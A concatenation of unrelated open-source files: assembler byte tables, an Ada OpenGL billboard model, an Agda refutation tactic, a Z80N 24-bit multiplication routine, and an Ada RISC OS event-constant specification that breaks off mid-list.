0xCB,0xE1,0xF3,0xF4,0xEC,0xE9,0xF1,0xFC,0x06,0x0F,0x16,0x1C,0x1F,0x24,0x25,0x23,0x1D,0x14,0x0B,0x02,0xFE,0xFD,0xFF,0xFF,0x0C,0x27,0x2F,0x10,0xE4,0xCA,0xC4,0xC2 db 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0x11,0x1C,0x26,0x2E,0x33,0x36,0x36,0x33,0x2C,0x26,0x1B,0x14,0x0C,0x0F,0x12,0x15,0x14,0x0B,0xFC,0xE9,0xD4,0xC4,0xB9,0xB5,0xB8,0xBF,0xCA,0xD7,0xE4,0xF3,0xFF,0x05 db 0x12,0x18,0x20,0x26,0x2C,0x30,0x31,0x2F,0x29,0x1E,0x16,0x0A,0x05,0xFC,0x07,0x0F,0x19,0x1D,0x0E,0xFC,0xDE,0xC3,0xB2,0xAA,0xB4,0xBD,0xCD,0xDD,0xEB,0xF8,0x02,0x0A db 0x09,0x12,0x1D,0x27,0x2E,0x32,0x31,0x2D,0x24,0x1A,0x0F,0x07,0xFF,0xFD,0xFB,0x0C,0x13,0x21,0x13,0x00,0xE5,0xC6,0xB6,0xAD,0xB7,0xC9,0xDA,0xED,0xF5,0xFB,0xFF,0x02 db 0x09,0x16,0x26,0x2F,0x36,0x36,0x33,0x2C,0x21,0x15,0x0E,0x03,0x01,0xFC,0xFE,0x13,0x12,0x22,0x0D,0xF9,0xDD,0xBE,0xB7,0xAF,0xC2,0xD2,0xE2,0xEF,0xF0,0xF4,0xF5,0xFD db 0x0A,0x1A,0x27,0x32,0x37,0x3A,0x38,0x33,0x2D,0x21,0x16,0x0D,0x02,0xFF,0xF7,0x09,0x0C,0x16,0x0F,0xF7,0xE4,0xC6,0xBF,0xB7,0xC0,0xCB,0xD2,0xDA,0xDC,0xE4,0xF0,0xFE db 0x1A,0x27,0x2F,0x37,0x3C,0x40,0x3F,0x3A,0x30,0x21,0x13,0x06,0xFD,0xF4,0xF2,0xFD,0x01,0x0B,0xFC,0xF4,0xDF,0xD6,0xC8,0xC3,0xC7,0xC6,0xCB,0xCB,0xD4,0xE3,0xF6,0x0B db 0x14,0x22,0x2F,0x39,0x41,0x46,0x46,0x40,0x35,0x26,0x17,0x08,0xFD,0xF2,0xEB,0xF0,0xF6,0xFF,0xFB,0xF5,0xE8,0xE0,0xD6,0xD2,0xCD,0xCC,0xC9,0xC9,0xCF,0xDC,0xF0,0x03 db 0x0A,0x1A,0x2D,0x39,0x42,0x47,0x49,0x43,0x3A,0x2B,0x1D,0x0D,0x01,0xF3,0xEE,0xED,0xF5,0xF5,0xF6,0xEF,0xEB,0xE2,0xDC,0xD4,0xD0,0xCB,0xC9,0xC9,0xCF,0xDA,0xEA,0xFA db 0x09,0x1A,0x28,0x34,0x3D,0x42,0x44,0x41,0x3A,0x31,0x26,0x1A,0x0C,0x03,0xFE,0xFC,0xFB,0xF9,0xF5,0xF1,0xE8,0xDE,0xD7,0xCE,0xC7,0xC3,0xC1,0xC4,0xCC,0xD9,0xE8,0xF8 db 0x0D,0x1E,0x2D,0x39,0x42,0x47,0x48,0x45,0x3E,0x35,0x29,0x20,0x13,0x08,0x01,0xFC,0xF8,0xF5,0xF2,0xED,0xE5,0xDB,0xD1,0xC8,0xC0,0xBB,0xBB,0xC0,0xCA,0xD7,0xE8,0xFA db 0x0A,0x1A,0x29,0x36,0x3F,0x45,0x46,0x43,0x3D,0x33,0x27,0x1A,0x0E,0x04,0xFC,0xF5,0xF1,0xED,0xEA,0xE6,0xE1,0xDB,0xD5,0xD0,0xCB,0xC8,0xC9,0xCD,0xD5,0xE0,0xE8,0xF8 db 0x08,0x17,0x24,0x2F,0x38,0x3D,0x3E,0x3C,0x36,0x2D,0x22,0x16,0x0B,0x00,0xF8,0xF1,0xEB,0xE8,0xE8,0xE5,0xE2,0xDE,0xDB,0xD7,0xD4,0xD2,0xD2,0xD4,0xDA,0xE2,0xED,0xFA db 0x08,0x12,0x1C,0x25,0x2E,0x33,0x36,0x35,0x31,0x2B,0x23,0x19,0x0F,0x05,0xFD,0xF5,0xEF,0xEB,0xE7,0xE4,0xE2,0xE0,0xDE,0xDD,0xDC,0xDC,0xDE,0xE1,0xE5,0xEC,0xF4,0xFE db 0x06,0x0E,0x15,0x1C,0x21,0x24,0x26,0x25,0x22,0x1E,0x19,0x13,0x0C,0x06,0xFF,0xF9,0xF4,0xF0,0xEC,0xE8,0xE6,0xE4,0xE1,0xDF,0xDF,0xE0,0xE2,0xE5,0xE9,0xEF,0xF6,0xFE db 0x03,0x02,0x02,0x01,0x01,0x00,0xFF,0xFF,0xFF,0x0B,0x0A,0x09,0x07,0x04,0x02,0xFF,0xFD,0xFB,0xFA,0xF9,0xF9,0xFA,0xFA,0xFB,0xFD,0xFE,0x00,0x01,0x02,0x03,0x03,0x03 CODE data2: db 0x08,0x0A,0x0B,0x0D,0x0D,0x0D,0x0D,0x0C,0x0C,0x0A,0x08,0x07,0x05,0x03,0x00,0xFE,0xFB,0xF8,0xF6,0xF3,0xF0,0xEF,0xED,0xEC,0xEB,0xEB,0xEC,0xEE,0xF0,0xF4,0xF8,0xFD db 0x17,0x24,0x2E,0x35,0x37,0x37,0x34,0x2E,0x27,0x22,0x1B,0x15,0x0F,0x0B,0x07,0x02,0xFD,0xF7,0xF1,0xEB,0xE4,0xDD,0xD5,0xCE,0xC8,0xC3,0xC4,0xD2,0xDC,0xEB,0xFB,0x09 db 0x1B,0x2A,0x34,0x39,0x3A,0x38,0x32,0x2B,0x26,0x20,0x1A,0x14,0x0F,0x0B,0x06,0x03,0xFE,0xF7,0xF1,0xE9,0xE1,0xD8,0xCE,0xC5,0xBC,0xB9,0xC0,0xC8,0xD5,0xE7,0xF9,0x0D db 0x22,0x34,0x3F,0x43,0x44,0x40,0x38,0x30,0x28,0x21,0x18,0x11,0x0D,0x08,0x05,0x02,0xFE,0xF8,0xF2,0xE9,0xE0,0xD5,0xC9,0xBD,0xB1,0xB1,0xB7,0xBF,0xD1,0xE5,0xFB,0x0F db 0x26,0x37,0x42,0x47,0x47,0x40,0x36,0x2D,0x26,0x1C,0x13,0x0E,0x0B,0x07,0x05,0x05,0x02,0xFD,0xF7,0xEE,0xE3,0xD6,0xC8,0xB9,0xAE,0xAE,0xB1,0xBC,0xCF,0xE5,0xFB,0x11 db 0x19,0x1D,0x21,0x23,0x20,0x1C,0x1A,0x16,0x16,0x19,0x19,0x16,0x0C,0x04,0x00,0x01,0xFF,0xFB,0xFA,0xF4,0xEA,0xE2,0xD9,0xCC,0xC5,0xCE,0xD3,0xD9,0xEA,0xF8,0x00,0x0E db 0x1F,0x1A,0x16,0x14,0x09,0x0A,0x0A,0x08,0x11,0x17,0x1A,0x1F,0x1E,0x17,0x15,0x0E,0x07,0x01,0xF9,0xF3,0xE9,0xE0,0xD6,0xCC,0xC2,0xC4,0xD2,0xE2,0xF2,0x0A,0x10,0x19 db 0x1B,0x13,0x0F,0x0B,0x00,0x06,0x05,0x0A,0x15,0x17,0x1F,0x26,0x1F,0x1D,0x17,0x0B,0x09,0x03,0xF9,0xF8,0xEC,0xE0,0xDC,0xCE,0xC2,0xC1,0xD6,0xE3,0xF6,0x0F,0x12,0x1A db 0x1A,0x13,0x0C,0x0E,0xFD,0x06,0x04,0x08,0x12,0x19,0x1D,0x28,0x25,0x20,0x1B,0x0F,0x08,0x02,0xF7,0xF3,0xEB,0xDF,0xDC,0xD1,0xCB,0xC1,0xD5,0xE4,0xEE,0x0B,0x0D,0x14 db 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0x0D,0x08,0x00,0xF7,0xE9,0xDF,0xD3,0xCE,0xC3,0xC9,0xEF,0xFF,0x19,0x13,0x0D,0x03,0xFE,0x01,0x04,0x0E,0x0D,0x0D,0x0C,0x0B,0x0E,0x10,0x13,0x12,0x10,0x0D,0x0D,0x0E db 0x04,0x02,0xFF,0xFC,0xFA,0xF8,0xF6,0xF5,0xF4,0xF4,0xF8,0xFC,0x00,0x04,0x04,0x05,0x04,0x04,0x03,0x03,0x03,0x01,0x05,0x06,0x06,0x06,0x06,0x03,0x02,0x02,0x03,0x04 db 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 db 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 db 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 db 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01 db 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0x00,0xFF,0xFE,0xFC,0xFB,0xFA,0xF9,0xF8,0xF8,0xF7,0xF7,0xF8,0xF9,0xFA,0xFD,0xFF,0x03,0x05,0x08,0x09,0x09,0x08,0x08,0x07,0x07,0x06,0x05,0x04,0x03,0x01,0x03,0x01

3-mid/opengl/source/lean/model/opengl-model-billboard-colored_textured.adb

charlie5/lace-alire

1

1105

<filename>3-mid/opengl/source/lean/model/opengl-model-billboard-colored_textured.adb with openGL.Primitive.indexed, openGL.IO; package body openGL.Model.billboard.colored_textured is type Geometry_view is access all Geometry.colored_textured.item'Class; --------- --- Forge -- function new_Billboard (Size : in Size_t := default_Size; Plane : in billboard.Plane; Color : in lucid_Color; Texture : in asset_Name) return View is Self : constant View := new Item; begin Self.define (Size); Self.Plane := Plane; Self.Color := Color; Self.Texture_Name := Texture; return Self; end new_Billboard; -------------- --- Attributes -- overriding function to_GL_Geometries (Self : access Item; Textures : access Texture.name_Map_of_texture'Class; Fonts : in Font.font_id_Map_of_font) return Geometry.views is pragma unreferenced (Textures, Fonts); use Geometry, Geometry.colored_textured, Texture; the_Indices : aliased constant Indices := (1, 2, 3, 4); the_Sites : constant billboard.Sites := vertex_Sites (Self.Plane, Self.Width, Self.Height); function new_Face (Vertices : access Geometry.colored_textured.Vertex_array) return Geometry_view is use openGL.Primitive; the_Geometry : constant Geometry_view := Geometry.colored_textured.new_Geometry; the_Primitive : constant Primitive.view := Primitive.indexed.new_Primitive (triangle_Fan, the_Indices).all'Access; begin the_Geometry.Vertices_are (Vertices.all); the_Geometry.add (the_Primitive); the_Geometry.is_Transparent; return the_Geometry; end new_Face; Color : constant rgba_Color := +Self.Color; the_Face : Geometry_view; begin declare the_Vertices : constant access Geometry.colored_textured.Vertex_array := Self.Vertices; begin the_Vertices.all := Geometry.colored_textured.Vertex_array' (1 => (site => the_Sites (1), color => Color, coords => (Self.texture_Coords (1))), 2 => (site => the_Sites (2), color => Color, coords => (Self.texture_Coords (2))), 3 => (site => the_Sites (3), color => Color, coords => (Self.texture_Coords (3))), 4 => (site => the_Sites (4), color => Color, coords => (Self.texture_Coords (4)))); the_Face := new_Face (Vertices => the_Vertices); if Self.texture_Name /= null_Asset then Self.Texture := IO.to_Texture (Self.texture_Name); end if; if Self.Texture /= null_Object then the_Face.Texture_is (Self.Texture); end if; end; Self.Geometry := the_Face; return (1 => Geometry.view (the_Face)); end to_GL_Geometries; procedure Color_is (Self : in out Item; Now : in lucid_Color) is begin Self.Color := Now; for i in Self.Vertices'Range loop Self.Vertices (i).Color := +Now; end loop; Self.is_Modified := True; end Color_is; procedure Texture_Coords_are (Self : in out Item; Now : in Coordinates) is begin Self.texture_Coords := Now; Self.needs_Rebuild := True; end Texture_Coords_are; overriding procedure modify (Self : in out Item) is begin Self.Geometry.Vertices_are (Self.Vertices.all); Self.is_Modified := False; end modify; overriding function is_Modified (Self : in Item) return Boolean is begin return Self.is_Modified; end is_Modified; end openGL.Model.billboard.colored_textured;

src/Tactic/Nat/Refute.agda

L-TChen/agda-prelude

111

12854

<filename>src/Tactic/Nat/Refute.agda module Tactic.Nat.Refute where open import Prelude open import Builtin.Reflection open import Tactic.Reflection.Quote open import Tactic.Reflection open import Tactic.Nat.Reflect open import Tactic.Nat.NF open import Tactic.Nat.Exp open import Tactic.Nat.Auto open import Tactic.Nat.Auto.Lemmas open import Tactic.Nat.Simpl.Lemmas open import Tactic.Nat.Simpl data Impossible : Set where invalidEquation : ⊤ invalidEquation = _ refutation : ∀ {a} {A : Set a} {Atom : Set} {{_ : Eq Atom}} {{_ : Ord Atom}} eq (ρ : Env Atom) → ¬ CancelEq eq ρ → ExpEq eq ρ → A refutation exp ρ !eq eq = ⊥-elim (!eq (complicateEq exp ρ eq)) refute-tactic : Term → TC Term refute-tactic prf = inferType prf >>= λ a → caseM termToEq a of λ { nothing → pure $ failedProof (quote invalidEquation) a ; (just (eqn , Γ)) → pure $ def (quote refutation) $ vArg (` eqn) ∷ vArg (quotedEnv Γ) ∷ vArg absurd-lam ∷ vArg prf ∷ [] } macro refute : Term → Tactic refute prf hole = unify hole =<< refute-tactic prf

libsrc/_DEVELOPMENT/math/float/math32/z80/f32_z80n_mulu_32h_24x24.asm

jpoikela/z88dk

0

90577

; ; feilipu, 2019 May ; ; This Source Code Form is subject to the terms of the Mozilla Public ; License, v. 2.0. If a copy of the MPL was not distributed with this ; file, You can obtain one at http://mozilla.org/MPL/2.0/. ; ;------------------------------------------------------------------------------ ; ; multiplication of two 24-bit numbers into a 32-bit product ; ; result is calculated for highest 32-bit result ; from a 48-bit calculation. ; ; Lower 8 bits intended to provide rounding information for ; IEEE floating point mantissa calculations. ; ; enter : abc = lde = 24-bit multiplier = x ; def = lde' = 24-bit multiplicand = y ; ; abc * def ; = (a*d)*2^32 + ; (a*e + b*d)*2^24 + ; (b*e + a*f + c*d)*2^16 + ; (b*f + c*e)*2^8 ; ; NOT CALCULATED ; (c*c)*2^0 ; ; 8 8*8 multiplies in total ; ; exit : hlde = 32-bit product ; ; uses : af, bc, de, hl, bc', de', hl' IF __CPU_Z80N__ SECTION code_clib SECTION code_fp_math32 PUBLIC m32_mulu_32h_24x24 .m32_mulu_32h_24x24 ld h,l ; ab:bc ld l,d ld a,h ; a in a exx ld h,a push hl ; ad on stack ld h,l ; de:ef ld l,d push hl ; de on stack push de ; ef on stack ld a,h ; d in a exx ld d,a ; dc in de ld b,h ld c,l ex (sp),hl ; ab on stack, ef in HL push de ; dc on stack push bc ; ab on stack (again) push hl ; ef on stack ld d,l ld a,h ld h,e ld e,a mul de ; b*e 2^8 ex de,hl mul de ; c*f 2^8 xor a add hl,de adc a,a ld c,h ; put 2^8 in bc ld b,a pop de ; ef pop hl ; ab ld a,d ld d,h ld h,a mul de ; a*f 2^16 ex de,hl mul de ; e*b 2^16 xor a add hl,bc adc a,a add hl,de adc a,0 pop de ; dc mul de ; d*c 2^16 add hl,de adc a,0 ld c,h ; put 2^16 in bca ld b,a ld a,l pop de ; ab pop hl ; de push af ; l on stack ld a,d ld d,h ld h,a mul de ; d*b 2^24 ex de,hl mul de ; a*e 2^24 xor a add hl,bc adc a,a add hl,de adc a,0 pop bc ; l in b ld c,b ld b,l ld l,h ld h,a pop de ; ad mul de ; a*d 2^32 add hl,de ld d,b ld e,c ; exit : HLDE = 32-bit product ret ENDIF

source/rascal-os.ads

bracke/Meaning

0

19876

<reponame>bracke/Meaning -------------------------------------------------------------------------------- -- -- -- Copyright (C) 2004, RISC OS Ada Library (RASCAL) developers. -- -- -- -- This library is free software; you can redistribute it and/or -- -- modify it under the terms of the GNU Lesser General Public -- -- License as published by the Free Software Foundation; either -- -- version 2.1 of the License, or (at your option) any later version. -- -- -- -- This library is distributed in the hope that it will be useful, -- -- but WITHOUT ANY WARRANTY; without even the implied warranty of -- -- MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -- -- Lesser General Public License for more details. -- -- -- -- You should have received a copy of the GNU Lesser General Public -- -- License along with this library; if not, write to the Free Software -- -- Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA -- -- -- -------------------------------------------------------------------------------- -- @brief OS events and types. Abstract task definition. -- $Author$ -- $Date$ -- $Revision$ with Kernel; use Kernel; with System; use System; with System.Unsigned_Types; use System.Unsigned_Types; with Ada.Unchecked_Conversion; package RASCAL.OS is type Event_Type is (Wimp,Message,Toolbox); type Event_Listener (K : Event_Type) is abstract tagged record Kind : Event_Type := K; end record; type Event_Pointer is access all Event_Listener'Class; procedure Handle (The : in Event_Listener) is abstract; type Byte is mod 2**8; type Wimp_Handle_Type is new Integer; type Icon_Handle_Type is new Integer; type Reason_Event_Code_Type is new System.Unsigned_Types.Unsigned; Reason_Event_NullReason : constant Reason_Event_Code_Type := 0; Reason_Event_RedrawWindow : constant Reason_Event_Code_Type := 1; Reason_Event_OpenWindow : constant Reason_Event_Code_Type := 2; Reason_Event_CloseWindow : constant Reason_Event_Code_Type := 3; Reason_Event_PointerLeavingWindow : constant Reason_Event_Code_Type := 4; Reason_Event_PointerEnteringWindow : constant Reason_Event_Code_Type := 5; Reason_Event_MouseClick : constant Reason_Event_Code_Type := 6; Reason_Event_UserDrag : constant Reason_Event_Code_Type := 7; Reason_Event_KeyPressed : constant Reason_Event_Code_Type := 8; Reason_Event_MenuSelection : constant Reason_Event_Code_Type := 9; Reason_Event_ScrollRequest : constant Reason_Event_Code_Type := 10; Reason_Event_LoseCaret : constant Reason_Event_Code_Type := 11; Reason_Event_GainCaret : constant Reason_Event_Code_Type := 12; Reason_Event_PollWordNonZero : constant Reason_Event_Code_Type := 13; Reason_Event_UserMessage : constant Reason_Event_Code_Type := 17; Reason_Event_UserMessageRecorded : constant Reason_Event_Code_Type := 18; Reason_Event_UserMessageAcknowledge : constant Reason_Event_Code_Type := 19; Reason_Event_ToolboxEvent : constant Reason_Event_Code_Type := 16#200#; type Wimp_EventListener (E : Reason_Event_Code_Type; W : Wimp_Handle_Type; I : Icon_Handle_Type) is abstract new Event_Listener(Wimp) with record Event_Code : Reason_Event_Code_Type := E; Window : Wimp_Handle_Type := W; Icon : Icon_Handle_Type := I; end record; type Message_Event_Code_Type is new System.Unsigned_Types.Unsigned; Message_Event_Quit : constant Message_Event_Code_Type := 0; Message_Event_DataSave : constant Message_Event_Code_Type := 1; Message_Event_DataSaveAck : constant Message_Event_Code_Type := 2; Message_Event_DataLoad : constant Message_Event_Code_Type := 3; Message_Event_DataLoadAck : constant Message_Event_Code_Type := 4; Message_Event_DataOpen : constant Message_Event_Code_Type := 5; Message_Event_RAMFetch : constant Message_Event_Code_Type := 6; Message_Event_RAMTransmit : constant Message_Event_Code_Type := 7; Message_Event_PreQuit : constant Message_Event_Code_Type := 8; Message_Event_PaletteChange : constant Message_Event_Code_Type := 9; Message_Event_SaveDesktop : constant Message_Event_Code_Type := 10; Message_Event_DeviceClaim : constant Message_Event_Code_Type := 11; Message_Event_DeviceInUse : constant Message_Event_Code_Type := 12; Message_Event_DataSaved : constant Message_Event_Code_Type := 13; Message_Event_Shutdown : constant Message_Event_Code_Type := 14; Message_Event_FilerOpenDir : constant Message_Event_Code_Type := 16#400#; Message_Event_FilerCloseDir : constant Message_Event_Code_Type := 16#401#; Message_Event_FilerOpenDirAt : constant Message_Event_Code_Type := 16#402#; Message_Event_FilerSelectionDirectory: constant Message_Event_Code_Type := 16#403#; Message_Event_FilerAddSelection : constant Message_Event_Code_Type := 16#404#; Message_Event_FilerAction : constant Message_Event_Code_Type := 16#405#; Message_Event_FilerControlAction : constant Message_Event_Code_Type := 16#406#; Message_Event_FilerSelection : constant Message_Event_Code_Type := 16#407#; Message_Event_AlarmSet : constant Message_Event_Code_Type := 16#500#; Message_Event_AlarmGoneOff : constant Message_Event_Code_Type := 16#501#; Message_Event_HelpEnable : constant Message_Event_Code_Type := 16#504#; Message_Event_Notify : constant Message_Event_Code_Type := 16#40040#; Message_Event_MenuWarning : constant Message_Event_Code_Type := 16#400c0#; Message_Event_ModeChange : constant Message_Event_Code_Type := 16#400c1#; Message_Event_TaskInitialise : constant Message_Event_Code_Type := 16#400c2#; Message_Event_TaskCloseDown : constant Message_Event_Code_Type := 16#400c3#; Message_Event_SlotSize : constant Message_Event_Code_Type := 16#400c4#; Message_Event_SetSlot : constant Message_Event_Code_Type := 16#400c5#; Message_Event_TaskNameRq : constant Message_Event_Code_Type := 16#400c6#; Message_Event_TaskNameIs : constant Message_Event_Code_Type := 16#400c7#; Message_Event_TaskStarted : constant Message_Event_Code_Type := 16#400c8#; Message_Event_MenusDeleted : constant Message_Event_Code_Type := 16#400c9#; Message_Event_Iconize : constant Message_Event_Code_Type := 16#40c10#; Message_Event_IconizeAt : constant Message_Event_Code_Type := 16#400D0#; Message_Event_WindowInfo : constant Message_Event_Code_Type := 16#40c11#; Message_Event_WindowClosed : constant Message_Event_Code_Type := 16#40c12#; Message_Event_FontChanged : constant Message_Event_Code_Type := 16#400CF#; Message_Event_PrintFile : constant Message_Event_Code_Type := 16#80140#; Message_Event_WillPrint : constant Message_Event_Code_Type := 16#80141#; Message_Event_PrintSave : constant Message_Event_Code_Type := 16#80142#; Message_Event_PrintInit : constant Message_Event_Code_Type := 16#80143#; Message_Event_PrintError : constant Message_Event_Code_Type := 16#80144#; Message_Event_PrintTypeOdd : constant Message_Event_Code_Type := 16#80145#; Message_Event_PrintTypeKnown : constant Message_Event_Code_Type := 16#80146#; Message_Event_SetPrinter : constant Message_Event_Code_Type := 16#80147#; Message_Event_PSPrinterQuery : constant Message_Event_Code_Type := 16#8014c#; Message_Event_PSPrinterAck : constant Message_Event_Code_Type := 16#8014d#; Message_Event_PSPrinterModified : constant Message_Event_Code_Type := 16#8014e#; Message_Event_PSPrinterDefaults : constant Message_Event_Code_Type := 16#8014f#; Message_Event_PSPrinterDefaulted : constant Message_Event_Code_Type := 16#80150#; Message_Event_PSPrinterNotPS : constant Message_Event_Code_Type := 16#80151#; Message_Event_ResetPrinter : constant Message_Event_Code_Type := 16#80152#; Message_Event_PSIsFontPrintRunning : constant Message_Event_Code_Type := 16#80153#; Message_Event_HelpRequest : constant Message_Event_Code_Type := 16#502#; Message_Event_HelpReply : constant Message_Event_Code_Type := 16#503#; Message_Event_Help_Word : constant Message_Event_Code_Type := 16#43B00#; Message_Event_TW_Input : constant Message_Event_Code_Type := 16#808C0#; Message_Event_TW_Output : constant Message_Event_Code_Type := 16#808C1#; Message_Event_TW_Ego : constant Message_Event_Code_Type := 16#808C2#; Message_Event_TW_Morio : constant Message_Event_Code_Type := 16#808C3#; Message_Event_TW_Morite : constant Message_Event_Code_Type := 16#808C4#; Message_Event_TW_NewTask : constant Message_Event_Code_Type := 16#808C5#; Message_Event_TW_Suspend : constant Message_Event_Code_Type := 16#808C6#; Message_Event_TW_Resume : constant Message_Event_Code_Type := 16#808C7#; Message_Event_PlugInQuit : constant Message_Event_Code_Type := 16#50D80#; Message_Event_PlugInQuitContinue : constant Message_Event_Code_Type := 16#50D81#; Message_Event_PlugInQuitAbort : constant Message_Event_Code_Type := 16#50D82#; Message_Event_OpenConfigWindow : constant Message_Event_Code_Type := 16#50D83#; Message_Event_Bugz_Query : constant Message_Event_Code_Type := 16#53B80#; Message_Event_Bugz_BugzFile : constant Message_Event_Code_Type := 16#53B81#; Message_Event_OLE_FileChanged : constant Message_Event_Code_Type := 16#80E1E#; Message_Event_OLEOpenSession : constant Message_Event_Code_Type := 16#80E21#; Message_Event_OLEOpenSessionAck : constant Message_Event_Code_Type := 16#80E22#; Message_Event_OLECloseSession : constant Message_Event_Code_Type := 16#80E23#; Message_Event_ConfiX : constant Message_Event_Code_Type := 16#40D50#; Message_Event_StrongEDModeFileChanged : constant Message_Event_Code_Type := 16#43b06#; Message_Event_StrongEDInsertText : constant Message_Event_Code_Type := 16#43b04#; Message_Event_InetSuite_Open_URL : constant Message_Event_Code_Type := 16#4AF80#; type Message_EventListener (E : Message_Event_Code_Type) is abstract new Event_Listener(Message) with record Event_Code : Message_Event_Code_Type := E; end record; type Message_Event_Header is record Size : System.Unsigned_Types.Unsigned; Sender : Integer; MyRef : System.Unsigned_Types.Unsigned; YourRef : System.Unsigned_Types.Unsigned; Event_Code : Message_Event_Code_Type; end record; pragma Convention (C, Message_Event_Header); type ToolBox_Event_Code_Type is new System.Unsigned_Types.Unsigned; Toolbox_Event_Error : constant ToolBox_Event_Code_Type := 16#44EC0#; Toolbox_Event_ObjectAutoCreated : constant ToolBox_Event_Code_Type := 16#44EC1#; Toolbox_Event_ObjectDeleted : constant ToolBox_Event_Code_Type := 16#44EC2#; Toolbox_Event_Menu_AboutToBeShown : constant ToolBox_Event_Code_Type := 16#828C0#; Toolbox_Event_Menu_HasBeenHidden : constant ToolBox_Event_Code_Type := 16#828C1#; Toolbox_Event_Menu_SubMenu : constant ToolBox_Event_Code_Type := 16#828C2#; Toolbox_Event_Menu_Selection : constant ToolBox_Event_Code_Type := 16#828C3#; Toolbox_Event_ColourDbox_AboutToBeShown : constant ToolBox_Event_Code_Type := 16#829C0#; Toolbox_Event_ColourDbox_DialogueCompleted : constant ToolBox_Event_Code_Type := 16#829C1#; Toolbox_Event_ColourDbox_ColourSelected : constant ToolBox_Event_Code_Type := 16#829C2#; Toolbox_Event_ColourDbox_ColourChanged : constant ToolBox_Event_Code_Type := 16#829C3#; Toolbox_Event_ColourMenu_AboutToBeShown : constant ToolBox_Event_Code_Type := 16#82980#; Toolbox_Event_ColourMenu_HasBeenHidden : constant ToolBox_Event_Code_Type := 16#82981#; Toolbox_Event_ColourMenu_Selection : constant ToolBox_Event_Code_Type := 16#82982#; Toolbox_Event_DCS_AboutToBeShown : constant ToolBox_Event_Code_Type := 16#82A80#; Toolbox_Event_DCS_Discard : constant ToolBox_Event_Code_Type := 16#82A81#; Toolbox_Event_DCS_Save : constant ToolBox_Event_Code_Type := 16#82A82#; Toolbox_Event_DCS_DialogueCompleted : constant ToolBox_Event_Code_Type := 16#82A83#; Toolbox_Event_DCS_Cancel : constant ToolBox_Event_Code_Type := 16#82A84#; Toolbox_Event_FileInfo_AboutToBeShown : constant ToolBox_Event_Code_Type := 16#82AC0#; Toolbox_Event_FileInfo_DialogueCompleted : constant ToolBox_Event_Code_Type := 16#82AC1#; Toolbox_Event_FontDbox_AboutToBeShown : constant ToolBox_Event_Code_Type := 16#82A00#; Toolbox_Event_FontDbox_DialogueCompleted : constant ToolBox_Event_Code_Type := 16#82A01#; Toolbox_Event_FontDbox_ApplyFont : constant ToolBox_Event_Code_Type := 16#82A02#; Toolbox_Event_FontMenu_AboutToBeShown : constant ToolBox_Event_Code_Type := 16#82A40#; Toolbox_Event_FontMenu_HasBeenHidden : constant ToolBox_Event_Code_Type := 16#82A41#; Toolbox_Event_FontMenu_Selection : constant ToolBox_Event_Code_Type := 16#82A42#; Toolbox_Event_Iconbar_Clicked : constant ToolBox_Event_Code_Type := 16#82900#; Toolbox_Event_Iconbar_SelectAboutToBeShown : constant ToolBox_Event_Code_Type := 16#82901#; Toolbox_Event_Iconbar_AdjustAboutToBeShown : constant ToolBox_Event_Code_Type := 16#82902#; Toolbox_Event_PrintDbox_AboutToBeShown : constant ToolBox_Event_Code_Type := 16#82B00#; Toolbox_Event_PrintDbox_DialogueCompleted : constant ToolBox_Event_Code_Type := 16#82B01#; Toolbox_Event_PrintDbox_SetupAboutToBeShown : constant ToolBox_Event_Code_Type := 16#82B02#; Toolbox_Event_PrintDbox_Save : constant ToolBox_Event_Code_Type := 16#82B03#; Toolbox_Event_PrintDbox_SetUp : constant ToolBox_Event_Code_Type := 16#82B04#; Toolbox_Event_PrintDbox_Print : constant ToolBox_Event_Code_Type := 16#82B05#; Toolbox_Event_ProgInfo_AboutToBeShown : constant ToolBox_Event_Code_Type := 16#82B40#; Toolbox_Event_ProgInfo_DialogueCompleted : constant ToolBox_Event_Code_Type := 16#82B41#; Toolbox_Event_ProgInfo_LaunchWebPage : constant ToolBox_Event_Code_Type := 16#82B42#; Toolbox_Event_Quit_AboutToBeShown : constant ToolBox_Event_Code_Type := 16#82A90#; Toolbox_Event_Quit_Quit : constant ToolBox_Event_Code_Type := 16#82A91#; Toolbox_Event_Quit_DialogueCompleted : constant ToolBox_Event_Code_Type := 16#82A92#; Toolbox_Event_Quit_Cancel : constant ToolBox_Event_Code_Type := 16#82A93#; Toolbox_Event_SaveAs_AboutToBeShown : constant ToolBox_Event_Code_Type := 16#82BC0#; Toolbox_Event_SaveAs_DialogueCompleted : constant ToolBox_Event_Code_Type := 16#82BC1#; Toolbox_Event_SaveAs_SaveToFile : constant ToolBox_Event_Code_Type := 16#82BC2#; Toolbox_Event_SaveAs_FillBuffer : constant ToolBox_Event_Code_Type := 16#82BC3#; Toolbox_Event_SaveAs_SaveCompleted : constant ToolBox_Event_Code_Type := 16#82BC4#; Toolbox_Event_Scale_AboutToBeShown : constant ToolBox_Event_Code_Type := 16#82C00#; Toolbox_Event_Scale_DialogueCompleted : constant ToolBox_Event_Code_Type := 16#82C01#; Toolbox_Event_Scale_ApplyFactor : constant ToolBox_Event_Code_Type := 16#82C02#; Toolbox_Event_Window_AboutToBeShown : constant ToolBox_Event_Code_Type := 16#82880#; Toolbox_Event_ActionButton_Selected : constant ToolBox_Event_Code_Type := 16#82881#; Toolbox_Event_OptionButton_StateChanged : constant ToolBox_Event_Code_Type := 16#82882#; Toolbox_Event_RadioButton_StateChanged : constant ToolBox_Event_Code_Type := 16#82883#; Toolbox_Event_DisplayField_ValueChanged : constant ToolBox_Event_Code_Type := 16#82884#; Toolbox_Event_WritableField_ValueChanged : constant ToolBox_Event_Code_Type := 16#82885#; 